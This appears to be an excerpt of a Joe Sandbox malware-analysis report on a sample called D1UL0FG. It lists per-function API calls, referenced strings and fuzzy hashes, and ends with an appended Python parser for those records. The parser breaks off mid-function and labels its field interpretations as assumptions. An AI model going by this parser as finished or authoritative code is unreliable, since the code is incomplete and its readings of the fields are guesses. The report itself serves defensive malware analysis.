                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B217C73A29B8186E660EB61B8817EA63A4EB883C4F400175EA8C97669DF3CD545DB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction ID: a67d9b6d7687c8864fc4872da8e96dc94bb806d9a0eff251c74822dc8b6b0ffa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0C222B29B0681FB509B20F85473A5360EF44761F4406B9DAAEC71F4DF2CD044E704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: bba2312b7da97a2eedaebef1015a100488629bdeb2adc4f0a40545f3c8225b86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35118273E7CA1301F6E43528F4963791054EF79364E044ABCFAEE866F68E2C69416D44
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB41F
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB43E
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB466
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB477
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB488
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                          • Instruction ID: 1d917f13ee69e1b3a437342bec29457ba60b02bf815dc72084d3c3190bea1fdb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8114F23A3D64682FA58B725A55127963915F847B0F4483B4E97DC76F6EF2CA801A301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
• Instruction ID: 2611c3228e4e072f99ac7daf1c7310118be4910334ca85d52c2e44a4c44d2ef2
• Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
• Instruction Fuzzy Hash: 57113C23E3D24782F9587325546227E13414F59730F4887B8D97ECA2F2DE3DB801A301
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
• Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction ID: b794151ac2e2be251bcb9b7728c8607c800a55adc27bdaa26b4fea030429d853
• Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction Fuzzy Hash: 3E91DF33A2CA4681F762AE28D45037D73A1AB44B94F444176DA9EC73E6DF3CE805A302
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
• Instruction ID: db7d6e1f5c1a643dc1519314539446ccaa9f6f0f31b074e72d4fdf170bbecf2e
• Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
• Instruction Fuzzy Hash: 05819D33E2C24285F7646F2981503793BA0AB11B58FE580B5DA0DD72BADF2DF901E701
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
• Instruction ID: c74a6c1eb0b8eb6344ef07313ca52e52fd130f8db6193bf14769008e3a0f6bcc
• Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
• Instruction Fuzzy Hash: 4251C337B2B6428ADB15EF15E484A783795EB84B98F2041B4DA4D877A8EF3CE841D700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
• Instruction ID: b3bb8f1faed0b69e03748649c3796e1feb07037086f257150ef2776c9b117dae
• Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
• Instruction Fuzzy Hash: D051913392838286EB64EF21954436877A0FB95B98F289275DA5D877E9CF3CE850D700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
• Instruction ID: 4d45a1bd54269c5c6fc4062e62b8a95757e7898f49d469dda6b1bc23e81ce9a1
• Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
• Instruction Fuzzy Hash: CA619133918BC585E760EB15E4403AAB7A0FBC5B94F144269EB9C87BA9DF7CD190CB00
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF67AED352C,?,00000000,00007FF67AED3F23), ref: 00007FF67AED7F22
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                          • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                          • Instruction ID: 23802568c6ccab5b5b1b57424590c5ade0ac70b5ce3517d4e6518026249558ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0331E622739AC149EA31AB20E8507EA6354EFC4BE4F541271EE6D877E9DF2CD641DB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                          • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction ID: 124081f46d344ce07242c9511651fcbb61625576befa83f9967deb589ebbf2e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A021AE73B28B8186E750AB64F8447EA63A4EB88780F404136EA8D97669DE3CD649D740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                          • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction ID: 25cffcac6c308c1d911f80ef2d5985f7324c656dbe1a42ab008ba0bc66a79432
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBD13273B28A818AF710DF74D4402AC37B1FB84798B048276DE5E97BA9DE38D456D780
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction ID: 10c56d16edc8ce774b309087459a0f5709734dadeac67502bc7988c8abfcf43d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1510473F2C2158AFB24EF6499616BC37A1AB40358F914279DE1ED2AF5DF38A4029700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                                          • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction ID: 4a3e458223fc3d5335aa9743605ae703e2afd08582acde6e135e2aecfd1f83b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01518F23E286418AFB10EFB1D4503BD23A1FB48B98F148579DE5D976A9DF38D441D720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                                          • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction ID: 3b3b8af1745ae865bf48ce2594468a64a44ccb6198796e99dc8e3b9130f0227a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B711A932B2C14282F654A769F64427A5252EFC4780F98C074DB4947BA9DD2DD8D5E600
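The per-function records above (Memory Dump Source, Similarity, API ID, String ID, fuzzy hashes) are easier to pivot on when parsed out of the report text than read by eye. The following parser is an added example, not Joe Sandbox code; it reads records in the layout shown on this page, pulls the fields an analyst triages on, and flags the `[PYI-%d:%ls]` string, which this example treats as an indicator of a PyInstaller bootloader (an assumption about that string's origin, not something the report itself states). The SAMPLE_RECORDS text is constructed from two of the records above so the script runs offline; the meaning assigned to the first dotted field of the `.sdmp` name (process number) is also an assumption.

```python
"""Parse Joe Sandbox per-function "Similarity" records into structured data.

Added example, not part of the Joe Sandbox report or product. SAMPLE_RECORDS is
constructed from two records on this page so the parser can run offline.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed from the report text above (two of the records, header lines only).
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\\
• API String ID: 4241100979-1685191245
• Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
• Instruction Fuzzy Hash: 0331E622739AC149EA31AB20E8507EA6354EFC4BE4F541271EE6D877E9DF2CD641DB00
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
• Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
• Instruction Fuzzy Hash: A021AE73B28B8186E750AB64F8447EA63A4EB88780F404136EA8D97669DE3CD649D740
"""

# "• Key: Value" bullet; the key runs up to the first colon, the value may contain colons.
BULLET_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
# Assumed indicator of a PyInstaller bootloader log prefix ("[PYI-<pid>:<level>]").
PYI_MARKER = "[PYI-"


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: str = ""
    api_id: str = ""
    strings: List[str] = field(default_factory=list)
    api_string_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""

    @property
    def process_no(self) -> str:
        # Assumption: the first dotted field of the .sdmp name ("00000005") is the
        # analysis process number the dump was taken from.
        return self.source_file.split(".", 1)[0]

    def looks_like_pyinstaller(self) -> bool:
        return any(PYI_MARKER in s for s in self.strings)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text on "Memory Dump Source" headers and fill one record each."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
            continue
        m = BULLET_RE.match(line)
        if not m or current is None:
            continue  # headings such as "Similarity" or lines before the first record
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            # "<name>.sdmp, Offset: <image base>, based on PE: true"
            name, _, rest = value.partition(", Offset: ")
            current.source_file = name
            current.offset = rest.split(",", 1)[0]
        elif key == "API ID":
            current.api_id = value
        elif key == "String ID":
            # Joe Sandbox joins the referenced strings with '$'; an empty value means none.
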